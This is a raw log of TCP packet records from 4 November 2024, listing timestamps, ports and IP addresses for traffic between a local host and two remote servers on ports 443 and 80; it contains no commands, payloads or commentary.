Nov 4, 2024 17:32:14.964638948 CET	49985	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.964651108 CET	443	49985	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.964674950 CET	49985	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.964674950 CET	49985	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.964683056 CET	443	49985	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.964689016 CET	443	49985	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.967236042 CET	49991	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.967272043 CET	443	49991	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.967353106 CET	49991	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.967468977 CET	49991	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.967483044 CET	443	49991	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.973176956 CET	443	49987	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.973485947 CET	49987	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.973495007 CET	443	49987	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:14.973931074 CET	49987	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:14.973936081 CET	443	49987	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.037621975 CET	443	49988	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.037643909 CET	443	49988	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.037715912 CET	443	49988	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.037713051 CET	49988	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.037767887 CET	49988	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.048393011 CET	49988	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.048418999 CET	443	49988	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.048434973 CET	49988	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.048441887 CET	443	49988	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.051119089 CET	49992	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.051165104 CET	443	49992	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.051234961 CET	49992	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.051363945 CET	49992	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.051378012 CET	443	49992	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.063045979 CET	443	49989	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.063119888 CET	443	49989	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.063193083 CET	49989	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.063339949 CET	49989	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.063364029 CET	443	49989	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.063375950 CET	49989	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.063385010 CET	443	49989	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.065479040 CET	49993	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.065519094 CET	443	49993	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.065593004 CET	49993	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.065824032 CET	49993	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.065838099 CET	443	49993	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.104612112 CET	443	49987	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.104645014 CET	443	49987	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.104819059 CET	49987	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.104831934 CET	443	49987	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.104845047 CET	443	49987	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.104906082 CET	49987	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.104906082 CET	49987	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.105061054 CET	49987	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.105072975 CET	443	49987	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.105091095 CET	49987	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.105101109 CET	443	49987	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.107830048 CET	49994	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.107862949 CET	443	49994	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.107953072 CET	49994	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.108083963 CET	49994	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.108097076 CET	443	49994	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.121982098 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.122410059 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.122431040 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.122987032 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.122993946 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.373986006 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.374013901 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.374036074 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.374073982 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.374097109 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.374110937 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.374150991 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.493854046 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.493906021 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.493941069 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.493953943 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.493980885 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.494004011 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.494651079 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.494652033 CET	49986	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.494673014 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.494683027 CET	443	49986	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.498110056 CET	49995	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.498151064 CET	443	49995	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.498238087 CET	49995	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.498373985 CET	49995	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.498385906 CET	443	49995	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.698009014 CET	443	49991	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.715152979 CET	49991	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.715169907 CET	443	49991	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.715540886 CET	49991	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.715548038 CET	443	49991	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.769736052 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.769763947 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.769779921 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.769793034 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.769814968 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.769829035 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.769876003 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.769877911 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.769891024 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.769906998 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.769929886 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.769942045 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.770059109 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.770081997 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.770104885 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.770121098 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.774944067 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.774992943 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.775007963 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.775059938 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.775100946 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.797292948 CET	443	49992	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.800796032 CET	49992	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.800812006 CET	443	49992	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.801363945 CET	49992	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.801369905 CET	443	49992	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.821176052 CET	443	49993	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.841244936 CET	49993	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.841270924 CET	443	49993	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.841669083 CET	49993	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.841675997 CET	443	49993	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.842878103 CET	443	49991	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.843619108 CET	443	49991	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.843692064 CET	49991	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.843988895 CET	49991	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.844006062 CET	443	49991	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.844023943 CET	49991	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.844029903 CET	443	49991	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.846637011 CET	49996	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.846687078 CET	443	49996	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.846760035 CET	49996	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.846894026 CET	49996	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.846904993 CET	443	49996	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.864650965 CET	443	49994	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.868618965 CET	49994	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.868638039 CET	443	49994	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.869074106 CET	49994	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.869079113 CET	443	49994	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.930003881 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.930021048 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.930144072 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.930192947 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.930222034 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.931070089 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.931256056 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.931298018 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.933094025 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.933109045 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.933124065 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.933141947 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.933151007 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.933157921 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.933171034 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.933172941 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.933186054 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:15.933204889 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.933218956 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:15.941309929 CET	443	49992	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.941382885 CET	443	49992	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.941606045 CET	49992	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.941662073 CET	49992	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.941662073 CET	49992	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.941680908 CET	443	49992	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.941689014 CET	443	49992	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.944679022 CET	49997	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.944741964 CET	443	49997	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.944813013 CET	49997	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.946405888 CET	49997	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.946423054 CET	443	49997	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.981337070 CET	443	49993	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.981408119 CET	443	49993	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.981573105 CET	49993	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.981729984 CET	49993	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.981750011 CET	443	49993	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.981755972 CET	49993	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.981765032 CET	443	49993	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.984261036 CET	49998	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.984302044 CET	443	49998	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:15.984359026 CET	49998	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.984530926 CET	49998	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:15.984538078 CET	443	49998	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.002366066 CET	443	49994	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.002882004 CET	443	49994	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.002929926 CET	443	49994	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.002996922 CET	49994	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.003024101 CET	49994	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.003037930 CET	443	49994	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.003094912 CET	49994	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.003102064 CET	443	49994	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.046660900 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.046715975 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.046720028 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.046732903 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.046756983 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.046768904 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.046773911 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.046911955 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.047020912 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.047063112 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.047094107 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.047110081 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.047135115 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.047147036 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.047169924 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.047185898 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.047223091 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.047852993 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.047909021 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.047919989 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.047960043 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.047971964 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.090233088 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.090246916 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.090312004 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.163932085 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.163947105 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.163973093 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.163985968 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.164011002 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.164048910 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.164117098 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.164129972 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.164165020 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.164320946 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.164370060 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.164385080 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.164407015 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.164423943 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.164434910 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.164942026 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.164980888 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.165004969 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.165020943 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.165055990 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.165329933 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.165397882 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.165412903 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.165441990 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.165462017 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.243638039 CET	443	49995	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.249768972 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.249820948 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.249834061 CET	49995	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.249834061 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.249851942 CET	443	49995	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.249876022 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.250283957 CET	49995	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.250292063 CET	443	49995	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.281102896 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281117916 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281146049 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281160116 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281173944 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.281182051 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281224966 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.281409025 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281464100 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281481028 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281506062 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.281518936 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.281689882 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281734943 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.281769037 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281795979 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281809092 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.281866074 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281884909 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.281939030 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.282399893 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.282430887 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.282449961 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.282455921 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.282464981 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.282499075 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.367180109 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.367206097 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.367289066 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.379240036 CET	443	49995	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.379321098 CET	443	49995	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.379386902 CET	49995	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.379605055 CET	49995	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.379617929 CET	443	49995	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.379631996 CET	49995	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.379638910 CET	443	49995	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.398781061 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.398830891 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.398849010 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.398849964 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.398874998 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.398890972 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.398952961 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.398967028 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.398982048 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.399002075 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.399008989 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.399044991 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.399189949 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.399235010 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.399238110 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.399257898 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.399297953 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.399363041 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.399369955 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.399377108 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.399418116 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.484438896 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.484466076 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.484541893 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.515697002 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.515748024 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.515763044 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.515782118 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.515810013 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.515822887 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.515837908 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.515840054 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.515851974 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.515866995 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.515870094 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.515878916 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.515901089 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.516225100 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.516267061 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.516303062 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.516310930 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.516349077 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.516402960 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.516417980 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.516431093 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.516453981 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.516473055 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.578239918 CET	443	49996	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.578682899 CET	49996	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.578695059 CET	443	49996	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.579138041 CET	49996	443	192.168.2.5	13.107.246.45
Nov 4, 2024 17:32:16.579147100 CET	443	49996	13.107.246.45	192.168.2.5
Nov 4, 2024 17:32:16.616508961 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.616564035 CET	80	49990	185.215.113.16	192.168.2.5
Nov 4, 2024 17:32:16.616561890 CET	49990	80	192.168.2.5	185.215.113.16
Nov 4, 2024 17:32:16.616600037 CET	49990	80	192.168.2.5	185.215.113.16
